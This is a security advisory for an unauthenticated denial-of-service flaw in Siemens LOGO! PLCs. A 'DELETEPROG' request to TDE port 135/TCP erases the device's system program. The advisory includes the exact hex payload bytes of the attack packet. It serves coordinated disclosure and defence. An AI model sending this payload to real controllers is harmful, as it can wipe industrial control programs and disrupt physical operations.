Siemens LOGO! TDE service "DELETEPROG" Denial of Service Vulnerability

Summary

An exploitable denial of service vulnerability exists in the TDE service functionality of Siemens LOGO! 1.82.02, 12/24RCE Version 0BA and 230RCE Version 0BA. A specially crafted network request can cause erased information resulting in a denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability.

Tested Versions

Siemens LOGO! 1.82.02
Siemens LOGO! 12/24RCE Version 0BA
Siemens LOGO! 230RCE Version 0BA

Product URLs

<https://new.siemens.com/global/en/products/automation/systems/industrial/plc/logo.html&gt;

CVSSv3 Score

9.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:H

CWE

CWE-306 - Missing Authentication for Critical Function

Details

Siemens LOGO! is an intelligent logic module (PLC) meant for automation projects such as industrial control systems, office/commercial and home settings. It is deployed worldwide and can be control remotely.

The LOGO System program can be completely erased through the TDE service port 135/TCP using the “DELETEPROG” function. The security vulnerability could be exploited by an unauthenticated attacker with network access to port 135/tcp. No user interaction is required to exploit this security vulnerability. The vulnerability impacts integrity of the device. The Payload used was the following:

Structure of payload message sent:

\x4B\xc0\x01\xe0 # Start of message: Signature, Version, ClientVersion, Sync Flag, Return Flag, Request Flag
\x00\x00\x00\x00 # Context
\x00\x00\x00\x00 # Session
\x44\x45\x4c\x45 # DELETEPROG command
\x54\x45\x50\x52
\x4f\x47\x00\x00
\x00\x10\x27\x00 # Timeout
\x00

We were able to identify this vulnerability on firmware 1.82.02 (released on May 13, 2019).

Timeline

2020-03-20 - Vendor Disclosure
2020-06-09 - Public Release